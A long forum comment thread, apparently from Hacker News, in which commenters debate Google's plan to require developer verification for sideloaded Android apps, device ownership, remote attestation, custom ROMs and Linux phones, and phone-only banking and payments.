in all things. I would encourage you and everyone who reads this post to stare down this option with realistic consideration. In a society this broken, it is the solution to more and more things. To check out, to accept the hard mode because to pick the path of convenience is to be exploited.
I respect at least your choice but I'm not growing tofu on the farm. Veganism is one of those protests that while I appreciate going after factory farms, you're only enabled to do so by large corporations.
In your country, maybe. Over here you're dead in the water without a smartphone — can't access banking except by going to the branch and standing in the queue for an hour or two, can't access most government services. Limit your selection of goods (like electronics, but not only that) by something like 90% (and also increase prices by 30-50%) because brick and mortar shops sell old crap at much higher cost than it was ever worth, and the only real solution is buying from a major marketplace which is only available as a mobile application.
This concept originated in China and is spreading. Beware.
@achrono (I cannot reply to the other post, I don't know why). Yes, you can use just a web browser.
> Mobile Payments
They work with a card, no smartphone required. Moreover, cash didn't cease to exist.
> Navigation
Again, physical maps are a thing. Google Maps or OpenStreetMap are accessible by browser. Having a physical map and having to follow road signs can be a beautiful experience. If one is addicted to a machine that tells them where to go, navigators are still a thing (no smartphone required)
> All manner of IoT devices
Don't put an IoT device in your house if you don't know what it does and how it works. If the only way to interface to it is via an app... then you don't know what it does and how it works. Don't put it in your house.
>Wearables
I don't even know what are wearables: if I write it on Firefox it underlines it in red. By doing a quick search, I can see images of watches. Watches can work without an app. Moreover, watches that work without an app are usually less expensive than the other kind.
> Digital versions of ID (Mobile Passport Control)
Don't. I know that some governments are pushing this crap thinking it's the future. Simply don't. Imagine you're at the airport and you accidentally drop your passport. You pick it up, nothing lost. Imagine you drop your phone and it stops working. You lost:
- Your documents
- Your money (if you rely on your phone for paying and don't have cash with you, which seems a growing trend among people I know)
- All your ways to contact people for help
Instead:
- Your wallet is stolen: you lost all your money and your cards, but you have your documents (at least the passport because it surely does not fit a wallet).
- Your phone is stolen: you lost all the ways to contact people, but you can buy another one
- Your passport is stolen: you can contact your embassy.
Smartphones are becoming a SPOF (Single Point Of Failure) for our lives.
Are you for real? I'm totally on board with using free and open alternatives, but if you're not going on a mountain trail then a physical map is going to be drastically worse than any navigation software.
Also FWIW I have a card-sized passport that I can easily get stolen with my wallet.
But, and I hesitate to point it out, because I am finding that people think it is somehow minimal entry stakes, one does not need any of those things..
You wouldn't get very far without WeChat and AliPay in China. Last time a good friend of mine was there, many merchants simply refused to accept cash. The few that did had made it known how much they were inconvenienced by doing that.
Same for basically every interaction with locals, for accessing government services, or even just using the public transportation.
It's pretty similar for locals AFAIK.
And before anyone replies that he didn't have to travel there — no, he did, unless he was willing to look for another job (which are very sparse here, you hold on to a good job for dear life).
He's talking about concert tickets and similar entertainment events, where several of the major providers no longer provide PDF tickets and instead only send them to a phone app. It is possible to make enough of a stink and collect tickets on the day, but that option is increasingly difficult to find.
Buy Apple; the point is to hurt Google. If enough people do it, Google might reconsider. Show them that the open ecosystem is the only value Android added, and if they refuse to bring back the open ecosystem then their platform will slowly die. Won't be long until Google's as locked-down as Apple at this rate, so all Android gives you is a power-hungry OS that protects your privacy even less than iOS does.
Buying closed stuff to show we want an open ecosystem?
At this point, I believe the most effective ways one can help with this is:
(1) advocacy - it's slow and difficult, but having people at least agree / be familiar with the idea that closed stuff is bad is a good first step.
Open ecosystems can't work for the general public if it's trapped in closed networks that won't work on anything else than the two big mobile operating systems, so making people start using open chat apps and such will help a lot. It'll take years, but so be it. It's worth it I think.
(2) helping improve the more open stuff.
I think Linux mobile for instance is a potentially viable alternative in the medium term for at least the basic use cases: Calls, SMS, GPS / Maps, Signal, photos. All this has no reason not to work with some polish. I daily drove Linux mobile 4 years ago for a year. The main thing I'm missing is good hardware for it, and a lot of polish but nothing impossible. Yeah, indeed, no payment with the phone (Google Pay / Apple Pay). But it's still possible to use the physical cards and not use the phone for this.
You've got to be kidding. Doesn't work, Apple is even more locked down than what this article announces. No sideloading whatsoever, signature checks ala Play Protect are mandatory and cannot be switched off, no alternative app stores, etc.
Not sure why this is downvoted. The entire value proposition of Android is the semi-open OS. For things you can’t do with Apple devices, you use the myriad of Android devices out there.
Yet most of the world runs Android. Its main value proposition was always wide selection of hardware for however much money you're willing to spend, not its relative openness.
I make relatively decent money by our standards, and I wouldn't even think about dropping $700-1000 on a phone (which isn't even officially sold or supported over here). For the vast majority of people it's their whole income over 2-4 months. I don't know or care how much you make, let's say it's $10k per month. Imagine if you had to pay $20-40k for a phone which is good for maybe 5-8 years.
I'm curious if GrapheneOS or other custom Android builds would be able to avoid these restrictions reasonably.
Obviously this is going to impact the supply of apps, since the market share of custom Android is smaller than even the market share of people willing to sideload or use an alternative store on a mainstream Android phone. Many developers might quit the game.
The problem with custom ROMs is that many government, banking, and similar apps don't run on them without workarounds. Some of those apps also consider this as a TOS violation as well.
When Microsoft first proposed a remote attestation scheme for PCs under the name Palladium, it was widely seen as a nightmare scenario. Even the mainstream press was critical[0]. There was barely a whimper when Google introduced SafetyNet a decade later.
It wasn't OK in 2003. It wasn't OK in 2014. It isn't OK now. I'm just not sure what anybody can do about it.
What changed is that the vast majority of users in 2025 are retarded normies that have never even considered trying to understand how their pocket computers work. And now that they are the majority, the voice of people that have even a remote understanding of how any of this works get drowned in the noise of social media divisiveness. Divide and Conquer. Oldest play in the book.
There are many third-party money apps that login to your online banking that are a violation of ToS. That doesn't stop people using them. In fact, when they get really big, they can be legitimised by banks. For example, to get my mortgage, I had to use a third party service that logs in to my online banking account and ingests all my transactions to show that I saved for my deposit legitimately.
Then I won't run those apps. Seriously. I know not everyone has this option, but it's been my experience that a lot of processes do in fact have workarounds when you show them the cryptic error their poorly behaved app throws.
I don’t use any utility apps (identity, banking, services etc) on my phone and stick to the desktop web. And don’t use services that do require me to have a Google or Apple account and phone. (Spoiler: I do)
I hope my tiny datapoint shows up in some aggregated stats somewhere.
GrapheneOS is a beautiful stop-gap, but there are real bona-fide Linux smartphones out there. To be clear, there are not many, the hardware often isn't great, the software often isn't great. PinePhone and Librem come to mind.
Cell carriers will just start requiring the attestation as well. And eventually, even an internet connection will - wifi routers will have to attest to ISP equipment, etc.
The final phase is "AI" monitoring everything you do on your devices. Eventually it won't just be passive, either, but likely active: able to change books you read and audio you listen to on-the-fly without your consent. It will be argued that this ok because the program is "objective".
At this point, I would stop using commercial cell carriers and ISP-provided equipment altogether, even if that means setting up mesh networks with an underground community. User control or bust.
I've been keeping an eye on FuriLabs (Furiphone). They maintain FuriOS - Debian with an Android kernel. Has a container for running Android apps. Price is reasonable though I don't know how it'll be affected by tariffs in the US. It's tempting.
Pretty sure Bunnie named it “precursor” because the plan is to make the actual phone (with a cellular modem) next. If I had the cash to support him and buy a Precursor I would.
Android is decades ahead of that in security, functionality, utility, devex, and design. It's a fool's errand to try and modernize that, over building on top of AOSP.
The alternative is just Apple; if Google loses enough users they might reconsider. Essentially the only real advantage Android had over Apple was being a more free platform/ecosystem; if they're going to do away with that, then they should be shown that this means they'll lose a lot of users.
Banking apps, messaging apps, streaming apps, even video games all want locked down devices. They will use hardware cryptography to discriminate against us and refuse service if they can't cryptographically prove we're using a corporate owned device.
Naughty user. Looks like you've been tampering with your device, installing unauthorized software and whatnot. Only money laundering drug trafficking child molesting terrorists do that. I'm gonna have to deny your request to log you into your bank account.
has anyone had to help any elderly relative with the million scams they've downloaded from google's app store? google does not give a shit about helping regular people avoid scams, it's all just bullshit.
not even to mention the h1b indian kickback stuff that's about to hit them. couldn't happen to a nicer company.
Helping elderly with scams: Yes, today, with Google Chrome. They got tricked into allowing desktop notifications and they look super legit on Microsoft Windows, styled like antivirus notifications and everything, covering the browser UI to get to the settings. I don't see how using closed software helps here
That might be one of the reasons. Get rid of competition by legal means.
In my case I keep a copy of K9 Mail 5.6 with the original UI (the reason I choose K9) and I sideload it to every device of mine. I'm afraid that I'll have to register an account and what, claim that that K9 is mine?
TL;DR
If you're not using Linux by now, do yourself a favor and start. You could do worse than starting with Linux Mint or PopOS, but whatever you do, get ahead of the curve and transition to these user-friendly open sourced OSes. The alternative is far, far worse at the moment.
aren't there braille terminals that work with linux? I don't know how you would make a rigorous blind UX other than working with a text interface first.
Every day we stray farther from the premise that we should be allowed to install / modify software on the computers we own.
Will once again re-up the concept of a “right to root access”, to prevent big corps from pulling this bs over and over again: https://medhir.com/blog/right-to-root-access
To be fair to Google, they got so much criticism for allowing so many spam apps.
There is no chance that we own our computers unless we figure out how to setup chip manufacturing factories at the 10 million dollar price point.
Without commoditized hardware, big capital will surely be in control of software.
I think there is also still room to legally require a common SW-layer with respective documentation to utilize features of underlying hardware (optional without the shipped OS on top, disconnecting the device from the shipped ecosystem).
This would also make sense in order to prevent e-waste and put this old hardware to better use.
It's crazy to think how much computing power is just added to a drawer or landfill every day, just because there is no reason for the vendor to allow you to repurpose it.
I would e.g. LOVE a "Browser on everything" OS which just provides a Browser OS for outdated hardware, but the only way this could work on scale would be if the device-vendor would be mandated to provide and document the lower layer...
We live in a world where the top chip makers are being shaken down by the US government to keep access to markets because embargoes and tariffs. And where software developers have to have a live feed of what every user is doing to Brussels or be arrested.
Too much capitalism isn't our problem.
Sounds like if US citizens hope for that, we can get it.
The question really isn't whether we should be able to modify computers we own, it's whether we own them at all.
The question of how private property, intellectual property and possession/ownership should work is indeed something humanity hasn't properly figured out yet.
But if anything, regular people should have more of the cake.
We have! The only problem is a very limited amount of legal decisions accidentally paved the way for a massive dystopia. In particular, the first sale doctrine [1] solves everything immediately.
The courts assumed good faith with a licensing exception, and maybe it was. But that opened the door to essentially completely dismantle the first-sale doctrine. Get rid of that loophole and all this stupidity ends, immediately. Well that and the DMCA. Once you buy something, it's yours to do whatever you want to do with it short of replicating it for commercial benefit.
[1] - https://en.wikipedia.org/wiki/First-sale_doctrine
You might be right. We're seeing a paradox of more and more exclusive ownership of property for commercial interests (land, water, airwaves, orbits) and fewer and fewer exclusive ownership for individuals (rented homes, licensed software, subscriptions etc). I too think we're still in a transition stage and humanity has yet to figure this thing out.
Throwing your hat in the political ring?
Regardless of what the corporations say we do own the devices we purchase.
Not always. There have been car manufacturers that sold vehicles with features only enabled by a subscription. You may buy a car with heated seats, but the heated seats only work if the manufacturer enables them.
And there should be no law against enabling the heated seats in the car you own without interacting with the manufacturer.
The heated seat is an edge case, but there is also the entirely valid argument that you shouldn't be able to arbitrarily modify your car (e.g. replace the brakes with some home-grown solution), as it can put yourself and others in danger, and I see no evil in that being enforced by the government. A more IT-related example might be what radio frequencies can we use - if anyone could spam the whole spectrum, we would lose more than from the "freedom" of being able to do that.
So it's actually far from trivial to draw a line.
> there is also the entirely valid argument that you shouldn't be able to arbitrarily modify your car
In at least two European countries that I know of (but probably in all of them) cars need to pass periodic technical inspection to be allowed on the road. Brakes are tested, among other things.
Technical inspections are mandatory across the board in all of the European Union, although the rules (such as the interval between inspections), may differ between countries. The minimum is every two years, some countries do yearly. This is actually governed by a European mandate.
Too bad there is one.
https://en.wikipedia.org/wiki/Digital_Millennium_Copyright_A...
Laws can be interpreted in such a way that invites robber barons to pound sand, or repealed.
Considering the same law is used to strike a 3 hour GPU documentary over a ~30 second clip, I think it serves to corporate pretty well.
GamersNexus' 3 hour documentary about GPU smuggling (which is way more than a blog as HN commenters like to portray) is struck down by Bloomberg because they didn't want their 30 second clip, which is squarely fair use BTW, of POTUS speaking to be in that. GamersNexus repealed successfully, but Bloomberg tried to bully them [0].
[0]: https://www.youtube.com/watch?v=tUnRWh4xOCY
Am I the only one that found that to be a reasonable edge case?
The seat heating was apparently shortening the life of the leather seats. It's cheaper to include heated seats in all cars, than it is to maintain 2 different sets of production. The subscription basically offsets the cost of needing to replace the seats more frequently when the heating is enabled.
Likewise, if you manually enabled the seat heaters, then complained that the seats were falling apart quickly, having given you a legal out to get that feature enabled in warranty, would not have to replace your seats for free.
Not to mention, they apparently already ditched the subscription over backlash.
> The subscription basically offsets the cost of needing to replace the seats more frequently when the heating is enabled
I never heard of car-manufacturers periodically replacing seats within warranty because of the wear of the material, regardless of being "more frequently" or not. This sounds like a massive oversight in product-design.
Of all the cases I know, the customer had to bear the cost of such "wear and tear" cases.
How about automated high/low beam switching or enabling the nominal power of your car instead of handicapping it by default?
If you agree that above are edge cases too, I have a Volkswagen to sell you [0].
[0]: https://www.youtube.com/watch?v=dQNeIcQXy74
> How about automated high/low beam switching
I would want the ability to change that. I actually think I can mess with that on my car.
> enabling the nominal power of your car instead of handicapping it by default?
Big topic for me. My car has a DPF, and appears to have been geared such that despite containing an automatic DPF burn process, the engine never quite reaches the required temperature, so I need to perform manual burns.
I have straight up asked the dealer for a method to enable the auto burn process, manually. And have asked if there's a retune available, to make the gearing just a little bit less efficient, giving me more power and more engine heat.
The issue, pretty much verbatim from their head regional diesel mechanic is that any modifications of that nature would fuck the emissions standards they had to limbo under. So it's categorically denied. They also issued me with stern official warnings that anything I do to make the car more reliable may also void my warranty. And the unofficial advice I have received is that the DPF is "f*cked mate" and to "get the petrol hybrid before the government forces it to wear a similar PPF"
The car also very suspiciously moderates the engine output unrelated to gearing/tune. Just sometimes underperforms at random. I believe it's computational again, like you say, handicapping it for emissions reasons.
These things are largely optional for me, but I won't mess with them too much until I am out of warranty.
> I would want the ability to change that. I actually think I can mess with that on my car.
Yes, generally you can disable on demand, but Volkswagen now sells the feature as a subscription. So you need to pay to enable. Maybe this is because it reduces the lifespan of the LEDs. Who knows.
> handicapping it for emissions reasons.
Volkswagen sells you another subscription for that now, at least for their electric vehicles. You can buy the option if you want your EV to perform as it's designed.
Emissions is a completely different beast. However their 140HP and 170HP TFSI engines had no different parts rather than the mapping.
Manipulating engines in a way which alters their carbon footprint is a sensitive topic, and while I was positive towards diesel systems, the particulate matter they emit, the fog they cause (see Paris photos, it's eye opening) and German engineering at its finest (i.e. Dieselgate scandal) soured me from diesel's automotive applications, big time, permanently.
This is the same argument people make between Apple and Android.
Can I use an Android phone without using Google? Yes, of course you can. There are plenty of secure OS's like Graphene, Lineage, Calyx and many others. Do people really care enough to use them? Hardly any, which proves my point.
Same thing here. Most people will just pay the fee to get the seats. Some might just opt out and not get them. Others will shop around and find some legacy cars that are older that have them but don't require a subscription.
At the end of the day? There's ALWAYS a choice. How hard do you want to look to avoid the subscription? Is it really worth your time and effort? Some would say yes, the vast majority really DGAF. People have been lulled into not caring about stuff like personal privacy and having a say in what's being peddled to you.
This is a ridiculous take.
The contention point will be whether you purchased the device or not.
In the meantime, corporate is thinking about locking browsers down. Remember this? https://chromestatus.com/feature/5796524191121408
They’ll try again, with big business and governments cheering on them.
Root access on your phone isn't enough: there's layers below root.
I accidentally read this as "there's lawyers below root" and I'm not sure I'm wrong.
It's lawyers all the way down :)
No matter what runlevel you’re on, judges are lower still.
https://en.wikipedia.org/wiki/Runlevel
I see no other way than regulation to force the two to provide drivers and manuals for alternative OS makers.
We should've nipped it with Apple, but there was so much _whatabout_ing that the conversation always got sidetracked with assertions about the free market and what not. It turns out, there is no free market, and we're just living in someone's managed device walled garden.
You can't steal something if you can't own it.
It's amazing how often we hamper the majority of society by protecting the bottom quintile from the consequences of their own mistakes.
The "bottom quintile"? By what metric?
That's not what it's ever actually about. You're buying a disingenuous framing that pins blame on the bottom when all these harmful trends come from the top. This isn't to protect grandma, it's to protect Google. This is always what happens when you allow pockets of power with interests misaligned from those of most people. The pockets of power get their way, and people are worse off.
The thing is, even if Google has a hidden motive in this case, the prevailing public morality doesn't allow you to argue against a measure designed to protect the weakest and poorest among us. Once a vulnerable group has been invoked, the public stops caring about their rights, the cost-benefit balance and most other rational concerns.
I think the phenomenon is most visible in the United Kingdom. Not just with respect to the recent age verification measures, but also with respect to the government's recent financial misadventures.
> You're buying a disingenuous framing
Of course it's a disingenuous framing. A certain kind of person is both attracted to power and deathly afraid of people voicing unapproved opinions "outside their kitchens".
Things can have multiple justifications, some public, some not: some conscious, some not. Central control and a feeling that a parental figure is in control of the tribe primes, at a primal level, a certain kind of person to like an idea. The specific post-hoc justification is almost incidental.
That said, such things need a semblance of legitimacy to work. It'd be much harder to crack down on general purpose computing under the guise of safety if we had cultural antibodies against safetyism in general.
Everyone makes mistakes
Protecting the bottom quintile from consequences of their mistakes also protects everyone else if they ever make those mistakes in a momentary lapse
Maybe society shouldn't be structured in such a way that people have to be constantly hyper vigilant to avoid mistakes with high consequences
It's just not possible to prevent mistakes while letting people color outside the lines. Most brilliant ideas look like stupidity at first. I want to live in a world that biases towards discovery over safety.
There is a line, at least a blurry one, though.
There is not much to discover from e.g. not using seatbelts. There is absolutely a need to protect a population from itself which should cover certain stuff, while not others.
> There is absolutely a need to protect a population from itself which should cover certain stuff
No, there isn't. I'd much rather live in a world where we were able to make our own decisions about personal safety, regardless of how poor those decisions are.
There's a direct line from mandating seatbelts to mandating developer certificates. If you accept in one domain that it's legitimate for power to reduce freedom to protect people from themselves, you'll accept it in every domain.
Look: in order for a mandate to be justifiable, it needs to at least provide superlinear benefit to linear adoption. That is, it has to solve a coordination problem.
Do seat belts solve any coordination problem? Do they benefit anyone but those wearing them? No. Therefore, the state has no business mandating them no matter the harm prevented.
A certain kind of person thinks differently though. He sees "harm" and relishes the prospect of "protecting" people from that "harm". They don't recognize the legitimacy of individual bad decisions. The self is just another person trying to hurt you. This kind of person would turn the whole world into a rubberized playground if he could.
You don't necessarily need to prevent all the mistakes, you can often just make them less costly.
s/the bottom quintile from the consequences of their own mistakes/the top centile from antitrust law/g
Sure. You will have the right to root, unless on a device with a locked bootloader. /s
Let's just call it what it is and what we all want. "The right to modify". It doesn't give you the right to copy, so it will never break any law protecting intellectual property.
> Every day we stray farther from the premise that we should be allowed to install / modify software on the computers we own.
I’ve never agreed with this premise.
I buy things that mostly meet my needs and desires in every other walk of life. I’m personally OK with extending this to computers as well.
That doesn't make sense. How do you meet your own needs and desires if you can't use your own property the way you want?
And isn't the point in this very situation that people simply can't buy what they want because Google and Apple are a duopoly and now Google is going to follow the path of restricting what you can do with your own property?
If I were in the 0.01%, savings wouldn't be a thing. I wouldn't even need a home. Just go around staying wherever I like for as long as I like doing whatever I want. I wouldn't really care about what google or apple does with their devices, who attacked or defeated whom and all that bs because I wouldn't be in survival mode.
At least this is probably how people in charge of enshittification think like.
This is based on the false assumption that the free market solves every problem.
But the reality (which was correctly identified by Adam Smith himself) is that the effort required to enter a market can sometimes be so high, that we practically end up with oligopolies, see mobile OSs. They require a network effect to make sense, so the entry cost is not just developing the product, but also to somehow convince basically every other player to consider you a target platform - which is a cyclical problem that you can't just bootstrap yourself into. Even Microsoft failed at it, even though they were paying hefty sums to companies for apps working on their OS.
My needs and desires are to have control over my tech stack.
Ok I'll bite. Tell me what you find appealing about losing authority? Is this some kind of emotional response for not wanting to take responsibility?
Are you intentionally defending a rent-economy or just ignorantly?
If this is a thing then the solution they offer is incorrect. A big giant red screen: “warning the identity of this application developer has not been verified and this could be an application stealing your data, etc” would have worked.
What they want is to get rid of apps like YouTube Vanced that are making them lose money (and other Play Store apps)
It felt weird that the official press release was quoting entities from these countries, as if it should give confidence to the rest of the world. I can't imagine what these countries would want with apps that can be traced back to a government id...
Vanced and such is more of a First World/Western issue. I don't think you're wrong but I got a strong gut feeling there's other pressures in the works. Just something doesn't smell right...
"Displaying an angry warning message" is one of the tools we've used for decades, and never with much success.
In addition to the other perspectives already offered here, warning screens such as the one you propose were already shown for sideloaded apps, and these screens worked against Google in their lawsuit with Epic Games. So that's another contributing factor for the policy we're discussing.
It won't work because of too many false positives. People are already trained to ignore warnings, like how they blindly accept T&C without reading.
If a giant red warning saying 'THIS APP MAY BE MALWARE' doesn't stop someone, then they've either made an informed choice to proceed or it's willful negligence. In other words, users aren't 'trained' to ignore warnings; they're simply being willfully negligent.
This is something laughable that Apple does. Anytime you install something from Github it'll make you click a few extra boxes. And their tightening down of things also ends up making people look for third party software in the first place. All this really does is, like you said, teach people to ignore warnings.
Is it possible to install stuff from GitHub on iOS? I thought it was completely impossible on apple devices.
I was referring to OSX but if you didn't know there's a current European lawsuit going on about doing exactly this for iOS
It is, but you have to reinstall it every week.
> It is, but you have to reinstall it every week.
I'd greatly appreciate it if you can share the relevant link/repo for it?
Then make the false positives lower. The problem is they aren't incentivized to improve such features because, where's the money in that?
The way we allow paternalistic tech companies to train the consumer to abdicate personal responsibility is going to bite us in the ass sooner or later. I'm betting on sooner.
It's such a simple and effective solution that could be implemented overnight and 'help to cut down on bad actors who hide their identity to distribute malware, commit financial fraud, or steal users personal data' tomorrow. Mission accomplished, internet saved, and everyone's happy just like a fairy tale out of the early 2000s.
I've often lamented at work that we lose freedom at the guise of "security".
Security and Intellectual Property (IP) protection could both be true. Google has a big enough reason to make it happen now.
In a perverse way it's not that protecting Google's IP is making us safer. Yet it, strangely, is.
Do you like losing money?
> Do you like losing money?
what about us losing control over our own devices? do you like losing control over devices you paid for?
People have no "control" over their own device if they have malware on it. The weirdo incoherent tech-chauvinism of "control" and "freedom" evidenced all over this thread is one of the most obnoxious trends on HN.
Would you give your car keys to a company, in fear that a thief might steal it?
Of course I care that I lose money.
I don't care that Google loses money.
Yet you expect them to act in a way that would make them lose money?
That was never the real reason. Security and "think of the children" to take away rights are the two oldest plays in the playbook.
The funny thing is Stallman started his fight like half a century ago and on regular days Hacker News shits on him eating something off of his foot and not being polished and diplomatic, and loves practical aspects of Corporate Open Source and gratis goodies and doesn't particularly care about Free Software.
On this day suddenly folks come out of the woodwork advocating for half baked measures to achieve what Stallman portrayed but they still hardly recognize this was EXACTLY his concern when he started the Free Software movement.
It's possible to believe both that Stallman is over the top and that stuff like this Google action is bad, and even to be right on both. It's even easier to believe that Stallman has had some good ideas but is still a deeply flawed human being, and has also incidentally not been the most effective advocate for his own ideals.
It is possible, sure, but I have a feeling it goes unrecognized how prophetic and precise his concerns were, and that this is very similar to his original issue with the closed-source printer software he was not allowed to fix, and he does not get credit for his predictions, as people simply pass by, and not connect it to the Free Software issue, when issues like this happen; meanwhile he takes all the downsides of being brash and anti-corporate, which is taken advantage of by the Corporate Open Source crowd.
Who is doing a better job?
Because I see A LOT of “open source” advocates these days, and more and more “source available”.
But the old school Free Software hippies(that started with BSD, NOT GNU, IMNHO) are slowly dying out and being replaced with?
I shit on Stallman because he fights quite vocally against singular they and neopronouns, and invents his own replacement for it. A cause no one needs his opinions on and a solution no one in the community wants.
It just seems needlessly pedantic and irritating to go to a minority group and say, "you minority group are doing your culture wrong". It, perhaps much more problematically, encourages others to feel like they should drive by trans and non binary communities and tell those communities about how they are doing language wrong.
He also said he was "skeptical that voluntary pedophilia harms children." There's a lot to unpack there, but that's a pretty deeply fucked up thing to say.
The foot stuff is a quirk. Kind of an icky quirk, but whatever. Those other critiques are very reasonable reasons to be uncomfortable lionizing rms.
I think his proposal to use "per" instead of "they" actually makes a lot of sense, because "they" is very confusing in a lot of contexts, because it's a word already used for another function. I don't see how you perceive that as something negative.
The quote about pedophilia is concerning indeed, but I think that rather stems from ignorance about the issues than promoting pedophilia. It's easy to shit on such things and wokely dismiss someone's entire opinion, which I find a bit weak.
The guy quite obviously is diversely talented. A computer genius, but well below generally agreed upon levels of mental deficiency in areas that most people care about.
This is really bad. I think that most people on HN will agree with that.
The problem is that most normal people (HN is not normal - mostly for the better) don't even understand what sideloading is - let alone actually care.
How can we fix this?
(aside from making people care - apathy enables so many political problems in the current age, but it's such a huge problem that this definitely isn't going to be the impetus to fix it)
This certainly won't solve the problem, but I would at least like to banish the term "side load", which is a kind of Orwellian word that takes something everyone used to do all the time and makes it sound obscure and a bit nefarious. Maybe we, the tech literate, can start calling sideloading a "free install" or something. When asked, we can clarify that the 'free' stands for both freedom, and not paying middlemen 30%.
This is a great point. Not sure if it’s possible, would be great if there was some way to reclaim the notion of installing software as a general practice, regardless of whether a computer is “mobile” or “desktop”.
Like people still download software packages from the web on Windows, MacOS, and Linux… right? Maybe hard to grasp for the kids that grew up with tablets with no notion of a file system, idk
I propose "load" or "install".
And while we are at it, "Application"
I call it "direct install" personally. It's how you are supposed to be able to install programs, directly from the source.
If anything, it's the playstore and appstore which are side channels.
This is a good term, as it avoids the libre/gratis confusion as well.
People install games from Steam or the Epic Store on their computers without Microsoft preventing that or taking a cut all the time (not for lack of trying. I know). But somehow, in the mobile world, we went with total lockdowns and platform extortion as the rule?
The irony of that iconic Apple 1984 ad.
> People install games from Steam or the Epic Store on their computers without Microsoft preventing that
Microsoft wishes they could have the level of platform control that Google/Apple on mobiles have.
It's pure luck that the IBM-compatible PC was not locked down and restricted, because at the time IBM had not thought of it as being important. When it became clear that it was a lost profit opportunity, the cat was already out of the bag and so IBM had no choice.
Microsoft repeated the same "mistake". But Apple learnt, and Google also from Apple.
I agree that this is a horrible step in the wrong direction but in terms of the solution I have a different take.
I don't think that making "normal" people "care" about sideloading is the answer, because a) it's impossible and b) political change doesn't happen through "normal" people anyway, all political and regulatory change is driven via smaller and motivated groups of people.
The problem is fundamentally that there's a duopoly on mobile OSes that has tons of market power and if they want to dictate a change like "you can no longer install unapproved software," they can just do it.
The solution is to walk away from that duopoly, to suck it up and just stop using their products. We fortunately are able to do this (for now) on desktop and running Linux in 2025 is better than it's ever been, and more people are doing it.
To get Linux or some alternative on phones is a big task, and if you make the switch you're going to lose a lot. But most of what has no desktop equivalent is addictive social media garbage that you should get rid of anyway. The biggest thing I'm concerned about is the state of banking and OTP/2FA.
I think we need to fight for universal electronic access to the financial system as a right without a need for gatekeepers like Apple or Google. In some countries it's already the case that at many businesses you must use your phone to make payments, cash is gone, cards are dying, and you must therefore agree to Apple or Google's rules to use your phone. This is truly how freedom and democracy will die if we allow it. This is way bigger for "normal" people than technical concepts like sideloading. People on the left should inherently understand the importance to liberty of having the right as an individual to buy and sell without some megacorp's permission. For people on the right, well, remember the Bible's "Mark of the beast..."
Secondarily we need to fight for the enforcement of anti-trust laws, which half of HN doesn't seem to even know exist, or feels are in some way unfair, even though they are the cause of these problems. Government needs to reach in and rearrange markets that are dominated by one or two players, it needs to forcefully restructure those companies so that they lose their market power and can no longer force citizens to obey their will. We've done it before, such as ending company towns where you were forced to use the company's scrip at the company's shop to buy living essentials. It's worked, we need to do it again.
I can do banking and otp at home with a 100 Euro phone that I use only for that. FB, TikTok, Instagram, etc, never ever installed them on my devices.
The problem is that I want to make calls, SMSes, use WhatsApp and Telegram, Maps and OSMAnd, NewPipe, VLC, Syncthing and a few others on the phone I carry with me.
And to make matters worse I don't want a huge, thick and heavy brick like every Linux phone I read about. I'm on a Samsung A40 now and it's not easy to find a replacement with similar size and weight.
How are you going to buy things when you leave home?
In the country I live in, which is a highly online and highly mobile first country, a sizeable minority of businesses no longer accept cash. A few no longer even accept cards.
At these businesses, there is only one way to pay, which is to pull out your phone, and initiate a transaction through your mobile banking app, you scan a QR from the vendor and approve the transfer.
Mobile banking is so ubiquitous that often these businesses don't even have signage outlining their payment policies, or it's tiny and hard to find.
Some banks do not have an online banking website, the only way to access your money and make a payment is to use the Android or iOS app on an unrooted device, or physically go to a branch or ATM.
You go somewhere, you buy, at the end of your meal or whatever they tell you phone only, no card, no cash.
It's prevalent enough that being outside of your home without an unrooted Google or Apple operating system physically on your person is a significant impediment to buying basic things, like a meal.
Apple and Google will, through a variety of technical changes, seek to make this the case in all of the world, and in some countries they'll succeed. So the important question now is: how will it go down in the next 10 years in your country? How far under their control is your society going to fall?
Banking, money and payments. Limiting those in the name of security is how they will get you on everything else.
They will take away cash and cards and there will only be payment apps, on approved secure OSes which you can't "tamper" with (aka install "unauthorized" software like VLC or a Youtube alternative on), or else the payments apps stop working.
They will take away SMS OTP and there will only be TOTP, because it's more secure. Then they will replace the OTP with a facial scan, because it's more secure, people were being social engineered into giving someone those numbers over the phone, etc.
This is all in process. They don't even hide it, they just say it's for security. It is already happening in countries that are highly online and highly phone-centric.
> You go somewhere, you buy, at the end of your meal or whatever they tell you phone only, no card, no cash.
Note that this is likely illegal, even though I'm sure it's very common in certain places, and arguing about legal tender laws is not how you want to spend every meal of course.
But, in principle, in most countries at least, businesses and private citizens are obligated to accept the country's currency to discharge debts. They're free to have an upfront no cash policy, and refuse to do business with you if you try to pay with cash, for example making you leave all your groceries at the checkout counter. But if they claim that you have a debt to them, such as a meal you've already eaten and now must pay for, they must accept any form of the country's currency, such as cash, as a means of you paying that debt off.
> I can do banking and otp at home with a 100 Euro phone that I use only for that.
That doesn't solve anything, though. If Google revoked your Google account and refused to open a new one, you'd be SOL - you'd either have to buy an iPhone, or move banks until you find one that gives you a physical TOTP (since many just have apps already, but those apps don't run unless downloaded from the Google or Apple stores).
Telegram's clients are open-source, and there's plenty of non-official ones, but for other proprietary messengers you're SOL.
Hard to believe at this point that these messengers used to use open standard protocols, and you could send messages from Google Talk to Facebook once.
> I don't want a huge, thick and heavy brick like every Linux phone I read about
While I understand your point, are you even going to notice after a couple of weeks of daily driving? Let’s not underestimate our ability to get used to things.
We need another os in the market. A duopoly just isn't competitive enough. Too bad the cost of entry is so high.
Valve has managed something similar with SteamOS as well as Proton built on Wine to make Windows games run on Linux, performing as good as or often better than an actual (modern) Windows install.
SteamOS isn’t too far from a mobile OS.
It's the mobile hardware drivers (such as for the modems and 5g etc) that are likely roadblocks - these hardware manufacturers probably have some sort of OEM agreements, and so cannot opensource these drivers for all devices.
I would wish that mobile devices' specs and hardware drivers are all available, so that I am not dependent on the manufacturer supplying a compatible OS.
I agree with you idealistically, but practically, creating an entirely new mobile OS with market share competitive with the existing two is an unbelievably massive challenge. It'd probably be just about as easy to get people to care about sideloading in the first place.
Remember how Android used to be an open source project and how we had Google backing AOSP? I think it's time we maintain the latest fork and just use that instead.
That only solves the OS side of things, but doesn't give you a good ecosystem. Unfortunately, an increasingly bigger number of apps rely on Google services and attestations, meaning you need a Google approved software to run them.
Is AOSP no longer a thing? I've been using GrapheneOS for a few years and admittedly lost track of AOSP, I just assumed it was still a thing despite Google generally wanting to control more and more.
Google now only drops the source code after a release, not during development. Also, much AOSP functionality has been moved to Google's Play Services, which is closed source.
